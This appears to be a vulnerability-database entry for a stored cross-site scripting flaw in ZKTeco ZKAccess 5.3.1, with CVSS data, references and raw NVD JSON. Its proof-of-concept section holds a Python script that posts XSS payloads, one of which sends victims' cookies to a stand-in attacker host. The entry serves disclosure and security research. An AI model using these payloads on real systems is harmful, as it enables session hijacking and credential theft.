CVE-2016-20032

Description

ZKTeco ZKAccess Security System 5.3.1 contains a stored cross-site scripting vulnerability that allows attackers to execute arbitrary HTML and script code by injecting malicious payloads through the 'holiday_name' and 'memo' POST parameters. Attackers can submit crafted requests with script code in these parameters to compromise user browser sessions and steal sensitive information.

CVSS Details

CVSS Score

7.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

ZKTeco ZKAccess Security System 5.3.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# CVE-2016-20032 Stored XSS PoC
# Target: ZKTeco ZKAccess Security System 5.3.1

target_url = "http://target.com/zkaccess/holiday/add"

# Malicious payload for holiday_name parameter
payload = {
    "holiday_name": "<script>alert(document.cookie)</script>",
    "memo": "<img src=x onerror=fetch('http://attacker.com/log?c='+document.cookie)>"
}

# Send malicious POST request (no authentication required)
response = requests.post(target_url, data=payload, timeout=10)

print(f"Status: {response.status_code}")
print("Payload sent successfully. Script will execute when admin visits holiday page.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2016-20032
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2016-20032
[3] CVE Details https://www.cvedetails.com/cve/CVE-2016-20032/
[4] VulDB https://vuldb.com/cve/CVE-2016-20032
[5] https://cxsecurity.com/issue/WLB-2016090004
[6] https://exchange.xforce.ibmcloud.com/vulnerabilities/116479
[7] https://packetstormsecurity.com/files/138572
[8] https://www.exploit-db.com/exploits/40328/
[9] https://www.vulncheck.com/advisories/zkteco-zkaccess-security-system-stored-xss
[10] https://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5368.php

Raw JSON Data

JSON

{"cve": {"id": "CVE-2016-20032", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:17:50.097", "lastModified": "2026-04-15T14:56:45.970", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "ZKTeco ZKAccess Security System 5.3.1 contains a stored cross-site scripting vulnerability that allows attackers to execute arbitrary HTML and script code by injecting malicious payloads through the 'holiday_name' and 'memo' POST parameters. Attackers can submit crafted requests with script code in these parameters to compromise user browser sessions and steal sensitive information."}, {"lang": "es", "value": "ZKTeco ZKAccess Security System 5.3.1 contiene una vulnerabilidad de cross-site scripting almacenada que permite a los atacantes ejecutar código HTML y de script arbitrario inyectando cargas útiles maliciosas a través de los parámetros POST 'holiday_name' y 'memo'. Los atacantes pueden enviar solicitudes manipuladas con código de script en estos parámetros para comprometer las sesiones del navegador del usuario y robar información sensible."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://cxsecurity.com/issue/WLB-2016090004", "source": "[email protected]"}, {"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/116479", "source": "[email protected]"}, {"url": "https://packetstormsecurity.com/files/138572", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/40328/", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/zkteco-zkaccess-security-system-stored-xss", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5368.php", "source": "[email protected]"}]}}